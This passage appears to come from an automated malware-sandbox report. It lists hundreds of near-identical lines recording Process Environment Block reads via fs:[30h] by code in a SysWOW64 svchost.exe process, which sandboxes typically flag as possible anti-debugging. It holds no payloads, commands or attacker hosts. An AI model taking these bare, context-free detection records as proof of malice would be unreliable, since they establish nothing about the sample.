                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]2_2_037280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]2_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]2_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]2_2_03728B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]2_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
